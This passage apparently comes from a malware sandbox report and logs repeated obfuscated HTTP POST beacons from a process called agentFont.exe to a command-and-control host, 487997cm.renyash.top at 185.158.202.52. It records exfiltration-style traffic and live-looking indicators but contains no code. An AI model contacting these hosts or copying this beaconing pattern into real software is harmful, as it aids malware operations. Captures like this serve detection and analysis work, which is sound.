                                                                                  Data Ascii: QQ][TGUZY_[RZSYTUWTPQ_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-+!&4>$\$=59=%/&_3?6"5:3?>4"-:(&X"#\.
                                                                                  Jan 1, 2025 11:28:56.875875950 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:57.006108999 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  129192.168.2.450132185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:57.129631042 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:28:57.487349033 CET1044OUTData Raw: 51 55 5d 53 54 42 55 5d 59 5f 5b 52 5a 5d 59 54 55 5e 54 5b 51 5c 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU]STBU]Y_[RZ]YTU^T[Q\[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.](2!R4=X2[5-[+1?3<_6%)'<)=;5[9\?:&X"#\.
                                                                                  Jan 1, 2025 11:28:57.794356108 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:57.927877903 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  130192.168.2.450133185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:58.051821947 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:58.409105062 CET1044OUTData Raw: 54 5a 58 5f 54 4a 50 59 59 5f 5b 52 5a 5e 59 56 55 5f 54 5c 51 51 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZX_TJPYY_[RZ^YVU_T\QQ[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+!%7.<&>B-[+T%?:',6!&1V0?.+7 !>>(&X"#\.8
                                                                                  Jan 1, 2025 11:28:58.691745996 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:58.822750092 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  131192.168.2.450134185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:58.945703030 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:28:59.301321983 CET1044OUTData Raw: 51 57 5d 5a 54 40 55 5d 59 5f 5b 52 5a 58 59 5d 55 5f 54 51 51 50 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]ZT@U]Y_[RZXY]U_TQQP[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+2) .8[2=:8$?-3?>Y#%-'%V*$"<:&X"#\.
                                                                                  Jan 1, 2025 11:28:59.592786074 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:28:59.724345922 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  132192.168.2.450135185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:28:59.856457949 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:00.205960989 CET1044OUTData Raw: 54 54 5d 53 54 45 55 5e 59 5f 5b 52 5a 59 59 57 55 55 54 5a 51 59 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]STEU^Y_[RZYYWUUTZQY[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+) [<]&[:97R22\'/)"5-Q3)78">6(*&X"#\.$
                                                                                  Jan 1, 2025 11:29:00.521708965 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:00.659693003 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  133192.168.2.450136185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:00.831130981 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:01.191768885 CET1040OUTData Raw: 51 50 58 5e 51 43 50 59 59 5f 5b 52 5a 5a 59 51 55 52 54 5c 51 5c 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QPX^QCPYY_[RZZYQURT\Q\[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.)"-"=&-%-=1&]0<"U$/5*4[!<&X"#\.8
                                                                                  Jan 1, 2025 11:29:01.468264103 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:01.598206997 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  134192.168.2.450137185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:01.734752893 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  135192.168.2.450138185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:01.901880980 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:02.252852917 CET1340OUTData Raw: 54 52 58 5f 51 47 50 5a 59 5f 5b 52 5a 5f 59 56 55 54 54 58 51 5a 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TRX_QGPZY_[RZ_YVUTTXQZ[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.](267-,[&-.-V&,.Y$?!6%'?W>4"*(:&X"#\.<
                                                                                  Jan 1, 2025 11:29:02.540538073 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:02.670094967 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 27 5e 2a 25 2f 5c 33 05 0b 53 33 00 2c 0d 2b 23 26 58 3b 12 39 10 27 2a 3c 5b 28 1d 23 1b 28 05 2a 1a 2b 2e 2c 5c 32 32 0e 56 32 35 2a 51 00 1c 23 13 3f 28 2b 1c 2b 01 2e 54 2a 21 01 5b 3f 05 23 5c 22 2a 02 0f 33 02 29 0a 33 3d 05 1f 28 3f 20 50 3b 1b 28 05 38 33 09 11 26 26 2f 52 09 14 21 58 2b 23 37 50 25 22 0c 12 33 0e 2b 5d 21 2b 2c 0f 37 0c 04 0d 21 30 23 12 3c 03 37 12 35 21 08 59 25 12 26 40 3c 5b 38 08 21 04 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: '^*%/\3S3,+#&X;9'*<[(#(*+.,\22V25*Q#?(++.T*![?#\"*3)3=(? P;(83&&/R!X+#7P%"3+]!+,7!0#<75!Y%&@<[8!#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  136192.168.2.450139185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:02.021928072 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:02.377856970 CET1044OUTData Raw: 54 53 5d 5b 54 45 55 5f 59 5f 5b 52 5a 5c 59 55 55 50 54 5f 51 51 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS][TEU_Y_[RZ\YUUPT_QQ[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<"&4>(]&-[3S1/936_6T%,6*$+6-2(&X"#\.0
                                                                                  Jan 1, 2025 11:29:02.657104969 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:02.785334110 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:28:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  137192.168.2.450140185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:02.914294958 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:29:03.268461943 CET1044OUTData Raw: 54 56 5d 5f 51 40 50 59 59 5f 5b 52 5a 5e 59 5d 55 50 54 50 51 5d 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]_Q@PYY_[RZ^Y]UPTPQ][_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._)2!U4(&@--1?Y%,^")%,1Q=5=*(:&X"#\.8
                                                                                  Jan 1, 2025 11:29:03.552181005 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:03.682168961 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  138192.168.2.450141185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:03.803205013 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:04.159091949 CET1044OUTData Raw: 54 52 58 5f 54 44 55 5b 59 5f 5b 52 5a 59 59 5d 55 50 54 58 51 51 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TRX_TDU[Y_[RZYY]UPTXQQ[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._+T%T">'&*D-=41,-3<>Y501R*70#.!)*&X"#\.$
                                                                                  Jan 1, 2025 11:29:04.440031052 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:04.570213079 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  139192.168.2.450142185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:04.695296049 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:05.049690962 CET1044OUTData Raw: 54 53 5d 52 54 44 55 51 59 5f 5b 52 5a 5c 59 51 55 5f 54 58 51 5b 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS]RTDUQY_[RZ\YQU_TXQ[[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<=R"-]&"A:=$?>'?""%'-R+4#^"?:&X"#\.0
                                                                                  Jan 1, 2025 11:29:05.341133118 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:05.471816063 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  140192.168.2.450143185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:05.606247902 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:05.956011057 CET1044OUTData Raw: 51 50 5d 53 54 42 55 51 59 5f 5b 52 5a 5e 59 5c 55 50 54 50 51 58 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]STBUQY_[RZ^Y\UPTPQX[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^(=U [2=%-.7U$/10?%66%V$/=B/\#.!]<*&X"#\.8
                                                                                  Jan 1, 2025 11:29:06.243604898 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:06.373976946 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  141192.168.2.450144185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:06.503803968 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:06.867765903 CET1040OUTData Raw: 51 55 5d 5f 54 41 55 5b 59 5f 5b 52 5a 5a 59 5c 55 53 54 51 51 51 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU]_TAU[Y_[RZZY\USTQQQ[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-)2 -2>D.S%0-5-%?W>$+5:(&X"#\.
                                                                                  Jan 1, 2025 11:29:07.150788069 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:29:07.279824972 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:29:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  142192.168.2.450145185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:07.410274029 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  143192.168.2.450146185.158.202.5280
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:29:07.681133986 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:29:08.034130096 CET1340OUTData Raw: 51 51 58 5b 54 4b 50 59 59 5f 5b 52 5a 5d 59 55 55 57 54 50 51 5c 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
